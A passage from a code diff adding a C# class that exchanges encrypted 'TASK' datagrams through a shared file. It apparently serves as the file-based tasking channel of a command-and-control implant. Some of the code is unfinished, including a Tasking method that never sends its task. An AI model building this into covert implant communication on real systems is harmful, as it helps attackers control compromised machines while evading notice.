+ Console.WriteLine(e.Message); + } + catch (Exception e) + { + Console.WriteLine(e.Message); + } + } + + public void Tasking(string input) + { + FCDataGram Task = new FCDataGram() { PacketType = "TASK", Input = input, Output = "", Actioned = false }; + + } + + public FCDataGram GetCurrentTasking() { + //Just to make the methods seem sensible. + return GetData(); + } + public void UpdateTask(FCDataGram Task) { + //Just to make the methods seem sensible. + SendData(Task); + } + + private void SafeFileWrite(string data) + { + //Guaranteed File Write. + FileStream f = null; + while (f == null) + { + try + { + f = new FileStream(FilePath, FileMode.Create, FileAccess.Write); + StreamWriter sr = new StreamWriter(f); + sr.WriteLine(data); + sr.Close(); + f.Close(); + sr.Dispose(); + f.Dispose(); + } + catch (IOException) + { + Thread.Sleep(200); // small sleep to wait before we loop to try again. Probably worth having an attempts limit, but could also massively break everything. Need to think about it. + } + } + } + private string SafeFileRead() + { + string StrTask = ""; + int counter = 0; + FileStream f = null; + while (f == null) + { + try + { + f = new FileStream(FilePath, FileMode.Open, FileAccess.Read); + StreamReader sr = new StreamReader(f); + string line; + while ((line = sr.ReadLine()) != null) + { + if (counter > 1) + { + throw new Exception(); + } + //This should only happen once. Should. SHOULD. but it wont. so above it'll throw an exception. + StrTask = (line); + counter++; + } + sr.Close(); + f.Close(); + sr.Dispose(); + f.Dispose(); + } + catch (IOException) + { + Thread.Sleep(500); // As above, small sleep to wait before we loop to try again. Probably need to do this more gracefully but not sure how to just yet. + } + } + return StrTask; + } + + private void SendData(FCDataGram DataToSend) + { + //Turn object into a string. + //encrypt it + //write it. + SafeFileWrite(Encrypt(Key, DataToSend.ToString())); + } + + private FCDataGram GetData() + { + //Get the contents of the file. + //Decrypt it + //Create a DataGram. + return new FCDataGram(Decrypt(Key, SafeFileRead())); + } + + public void CleanUp() + { + //maybe utilise POSH SHRED here? + File.Delete(FilePath); + } + private static string Decrypt(string key, string ciphertext) + { + var rawCipherText = Convert.FromBase64String(ciphertext); + var IV = new Byte[16]; + Array.Copy(rawCipherText, IV, 16); + try + { + var algorithm = CreateEncryptionAlgorithm(key, Convert.ToBase64String(IV)); + var decrypted = algorithm.CreateDecryptor().TransformFinalBlock(rawCipherText, 16, rawCipherText.Length - 16); + //return decrypted; + //return decrypted.Where(x => x > 0).ToArray(); + return Encoding.UTF8.GetString(decrypted.Where(x => x > 0).ToArray()); + } + catch + { + var algorithm = CreateEncryptionAlgorithm(key, Convert.ToBase64String(IV), false); + var decrypted = algorithm.CreateDecryptor().TransformFinalBlock(rawCipherText, 16, rawCipherText.Length - 16); + //return decrypted; + return Encoding.UTF8.GetString(decrypted.Where(x => x > 0).ToArray()); + //return decrypted.Where(x => x > 0).ToArray(); + } + finally + { + Array.Clear(rawCipherText, 0, rawCipherText.Length); + Array.Clear(IV, 0, 16); + } + + } + + private static string Encrypt(string key, string un, bool comp = false, byte[] unByte = null) + { + byte[] byEnc; + if (unByte != null) + byEnc = unByte; + else + byEnc = Encoding.UTF8.GetBytes(un); + + if (comp) + byEnc = GzipCompress(byEnc); + + try + { + var a = CreateEncryptionAlgorithm(key, null); + var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length); + return Convert.ToBase64String(CombineArrays(a.IV, f)); + } + catch + { + var a = CreateEncryptionAlgorithm(key, null, false); + var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length); + return Convert.ToBase64String(CombineArrays(a.IV, f)); + } + } + + private static SymmetricAlgorithm CreateEncryptionAlgorithm(string key, string IV, bool rij = true) + { + SymmetricAlgorithm algorithm; + if (rij) + algorithm = new RijndaelManaged(); + else + algorithm = new AesCryptoServiceProvider(); + + algorithm.Mode = CipherMode.CBC; + algorithm.Padding = PaddingMode.Zeros; + algorithm.BlockSize = 128; + algorithm.KeySize = 256; + + if (null != IV) + algorithm.IV = Convert.FromBase64String(IV); + else + algorithm.GenerateIV(); + + if (null != key) + algorithm.Key = Convert.FromBase64String(key); + + return algorithm; + } + + private static byte[] GzipCompress(byte[] raw) + { + using (MemoryStream memory = new MemoryStream()) + { + using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true)) + { + gzip.Write(raw, 0, raw.Length); + } + return memory.ToArray(); + } + } + + private static byte[] CombineArrays(byte[] first, byte[] second) + { + byte[] ret = new byte[first.Length + second.Length]; + Buffer.BlockCopy(first, 0, ret, 0, first.Length); + Buffer.BlockCopy(second, 0, ret, first.Length, second.Length); + return ret; + } +}